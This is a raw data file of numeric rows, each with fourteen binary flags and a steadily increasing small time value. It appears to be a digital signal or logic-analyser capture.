1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5654520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5654760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5655000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5655240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5655480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5655760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5656000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5656200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5656520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5656760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5657000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5657240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5657480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5657720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5658000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5658200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5658520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5658760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5659000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5659240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5659480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5659720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5660000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5660200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5660520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5660760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5661000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5661240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5661480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5661720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5662000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5662200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5662520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5662760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5663000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5663240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5663480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5663720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5664000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5664200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5664520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5664760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5665000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5665240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5665480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5665720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5666000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5666240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5666520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5666760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5667000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5667240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5667480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5667720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5668000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5668200e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5668520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5668760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5669000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5669240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5669480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5669720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5670000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5670240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5670520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5670760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5671000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5671240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5671480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5671720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5672000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5672240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5672520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5672760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5673000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5673240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5673480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5673720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5674000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5674240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5674520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5674760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5675000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5675240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5675480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5675720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5676000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5676240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5676520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5676760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5677000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5677240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5677480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5677720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5678000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5678240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5678520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5678760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5679000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5679240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5679480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5679720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5680000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5680240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5680520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5680760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5681000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5681240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5681480e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5681720e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5682000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5682280e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5682520e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5682760e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5683000e-03 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.5683240e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.5683480e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.6933160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.6935320e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.6935480e-03 0,0,1,1,0,0,0,0,0,0,0,1,0,1,3.6935800e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.6936040e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.6939200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.6939480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.6939720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.6939960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.6940200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.6940440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.6940680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,3.6940960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,3.6941200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6941480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6941720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6941960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6942200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6942440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6942680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6942960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6943200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6943480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6943720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6943960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6944440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6944680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6944960e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6945200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6945480e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6945720e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6945960e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6946200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6946440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6946680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6946920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6947200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6947400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6947680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6947960e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6948200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6948440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6948680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6948960e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6949200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6949480e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6949680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6950200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6950440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6950680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6950960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6951200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6951480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6951680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6951960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6952200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6952440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6952680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6952960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6953200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6953480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6953680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6953960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6954200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6954440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6954680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6954960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6955200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6955480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6955680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6955960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6956200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6956440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6956680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6956960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6957480e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6957680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6958200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6958440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6958960e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6959200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6959720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6959960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6960440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6960680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6961240e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6961480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6961720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6961960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6962200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6962440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6962680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6962960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6963200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6963480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6963720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6963960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6964200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6964440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6964680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6964960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6965200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6965480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6965720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6965960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6966200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6966440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6966680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6966960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6967200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6967480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6967720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6967960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6968200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6968440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6968680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6968960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6969200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6969480e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6969720e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6969960e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6970200e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6970440e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6970960e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6971200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6971480e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6971720e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6971920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6972200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6972440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6972680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6972920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6973160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6973400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6973680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6973920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6974200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6974440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6974680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6974920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6975160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6975400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6975680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6975920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6976200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6976440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6976680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6976920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6977160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6977400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6977680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6977920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6978200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6978440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6978680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6978920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6979160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6979400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6979680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6979920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6980200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6980440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6980680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6980920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6981160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6981400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6981680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6981920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6982200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6982440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6982680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6982920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6983160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6983400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6983680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6983920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6984200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6984440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6984680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6984920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6985160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6985400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6985680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6985920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6986200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6986440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6986680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6986920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6987160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6987400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6987680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6987920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6988200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6988440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6988680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6988920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6989160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6989400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6989680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6989920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6990200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6990440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6990680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6990920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6991160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6991400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6991680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6991920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6992200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6992440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6992680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6992920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6993160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6993400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6993680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6993920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6994200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6994440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6994680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6994920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6995160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6995400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6995680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6995920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6996200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6996440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6996680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6996920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6997160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6997400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6997680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6997920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6998200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6998440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6998680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6998920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6999160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6999400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.6999680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.6999920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7000200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7000440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7000680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7000920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7001160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7001400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7001680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7001920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7002200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7002440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7002680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7002920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7003160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7003400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7003680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7003920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7004200e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7004440e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,3.7004680e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,3.7004960e-03 0,0,1,1,0,1,0,0,0,1,0,0,0,0,3.7005240e-03 0,0,1,1,0,1,0,0,0,1,0,0,0,1,3.8252200e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.8254280e-03 1,0,1,1,0,1,0,0,0,1,0,1,0,1,3.8254520e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.8254840e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,1,3.8257880e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,3.8258120e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.8258200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.8258400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.8258680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.8258920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.8259160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.8259400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.8259640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.8259880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,3.8260120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,3.8260400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8260520e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8260640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8260920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8261120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8261400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8261640e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8261880e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8262120e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,3.8262680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,3.8262880e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,3.8262960e-03 